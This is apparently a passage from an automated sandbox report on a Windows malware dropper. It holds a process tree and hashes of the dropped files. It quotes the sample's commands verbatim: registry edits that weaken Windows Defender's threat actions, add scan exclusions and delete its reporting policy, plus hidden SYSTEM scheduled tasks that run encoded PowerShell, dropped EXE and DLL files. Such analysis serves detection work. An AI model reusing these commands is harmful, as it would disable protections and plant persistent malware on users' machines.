PID:4972 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4588
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4504
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCYGDcGEHxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCYGDcGEHxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fCscXRmSsoZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fCscXRmSsoZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jPDVFKipU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jPDVFKipU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yNjTJhHiELlhC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yNjTJhHiELlhC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NTslqXAyKxgJdOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NTslqXAyKxgJdOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xKkxXQQPSIyydVpo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\xKkxXQQPSIyydVpo\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:323⤵PID:5020
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:324⤵PID:4952
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCYGDcGEHxUn" /t REG_DWORD /d 0 /reg:643⤵PID:400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:323⤵PID:3000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR" /t REG_DWORD /d 0 /reg:643⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:323⤵PID:4620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fCscXRmSsoZU2" /t REG_DWORD /d 0 /reg:643⤵PID:2576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:323⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jPDVFKipU" /t REG_DWORD /d 0 /reg:643⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:323⤵PID:4480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yNjTJhHiELlhC" /t REG_DWORD /d 0 /reg:643⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NTslqXAyKxgJdOVB /t REG_DWORD /d 0 /reg:323⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NTslqXAyKxgJdOVB /t REG_DWORD /d 0 /reg:643⤵PID:3852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf /t REG_DWORD /d 0 /reg:323⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf /t REG_DWORD /d 0 /reg:643⤵PID:3548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xKkxXQQPSIyydVpo /t REG_DWORD /d 0 /reg:323⤵PID:2380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\xKkxXQQPSIyydVpo /t REG_DWORD /d 0 /reg:643⤵PID:4392
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXEayGZYk" /SC once /ST 14:50:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gXEayGZYk"2⤵PID:4564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gXEayGZYk"2⤵PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FFlCdDCQpdthnDzXV" /SC once /ST 12:52:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe\" PY /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FFlCdDCQpdthnDzXV"2⤵PID:4016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1204
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3504
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1984
-
C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exeC:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe PY /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bJrbMHMDNUyqMIPThG"2⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3600
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3684
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3228
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jPDVFKipU\osfrqn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SXVvvXCuCecgohx" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SXVvvXCuCecgohx2" /F /xml "C:\Program Files (x86)\jPDVFKipU\RSLJtAC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SXVvvXCuCecgohx"2⤵PID:4768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SXVvvXCuCecgohx"2⤵PID:1328
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EOkhxrYxAEIuAx" /F /xml "C:\Program Files (x86)\fCscXRmSsoZU2\iBKpDxJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PwfdYqkpoBAoU2" /F /xml "C:\ProgramData\NTslqXAyKxgJdOVB\fEUDUqU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sZntjluwdORXGerps2" /F /xml "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\sRoWRPe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hUZrJIygDlPKjnJiuVx2" /F /xml "C:\Program Files (x86)\yNjTJhHiELlhC\cTLLege.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZGhVhnWHpCkuylUXB" /SC once /ST 06:35:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZGhVhnWHpCkuylUXB"2⤵PID:3260
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1248
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1148
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FFlCdDCQpdthnDzXV"2⤵PID:2408
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll",#1 /site_id 5254031⤵PID:4072
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1340 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZGhVhnWHpCkuylUXB"3⤵PID:1548
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD554cd1328c042c79a6633a2bb38b3c4d6
SHA1bbc8a437ae86de23e38788a82944474011ce3997
SHA2561d98c8dc577f373e4d5739c93421c44fc09aac5bd50e2b6f157cc271f095826d
SHA512ffd2d979d3b0e3da5a2167df7fd6d9b3405d77240093238f8102ab4ebd7642fd6bd7c89272b476196e03e29c3463cfc15af539e134d237204a058ecafa52cea7
-
Filesize
2KB
MD5b22ec4e7ff2fa55db5dbcbfec2b5ed0f
SHA184313bc047f47aa75413a6213b6a4bcb2e20cd54
SHA256009d9cc0d213bd594507d38fc311162857fc21daa714b2718e3e9b41b6a09aa7
SHA512c1132b03d4aae1540c8ba32912c351b4d526c60de1a6b25a6e82954763d6833899df5f92d437b0ffb430a7d42f8536fad0c17926c5878883bf532855bfe170b6
-
Filesize
2KB
MD5bf536afe654459c7ca486f825472d708
SHA10f823b581f45b4a72860b038e1e3684973b6b677
SHA25677b18514b619f7810d94089d9766932db114d107d6d8d29eddc6de3e1e635e15
SHA512b90577e1ba0f709f863838aa1cd5d2827a7c0736f40a5c5d30135fb5391e9de24deca871dc449bdca8badb26b2870428cdaf6a2ec514a9a6a0fec1068eec5118
-
Filesize
2KB
MD59b55df3441137d8b92f2e77fd01ec37f
SHA15e31b6e6d6ce551d620a6933a4792287ca0bc497
SHA2563193734a65b7d03423c567c79d37092c311208fc7a0391549b3dcb371fe60097
SHA5127fb9de431e63b50d96f9d3f007c3c5927f467c0531b865bdfc38ff505c749373c1715450b6aaa73d124004b753723154e61f8d1587d0cddb92ff2ad94a1db13f
-
Filesize
2KB
MD5d99646fa3270656c19623c33c218361f
SHA1dd7ce3d36a5844e16fca3bdeaba871d5517c05c4
SHA25670edec2a6938c2b961befb031facb9e589408f81c82d7555362a6b8247056b64
SHA512a2bb3eb8719c36f4d0b7341c32bf46813c35cfb77514e73cd3b3c6e20bc8030cbea1f435f8e5017bcb3da992221c8939bcc7d54d8105eaec139266fd705e949f
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
SHA1ee90433b4579a5e67273c0b0be168d0ea0e0b9e9
SHA2560910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e
SHA512179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a
-
Filesize
6.3MB
MD50164cb234b472f30b7563528ebe0cd66
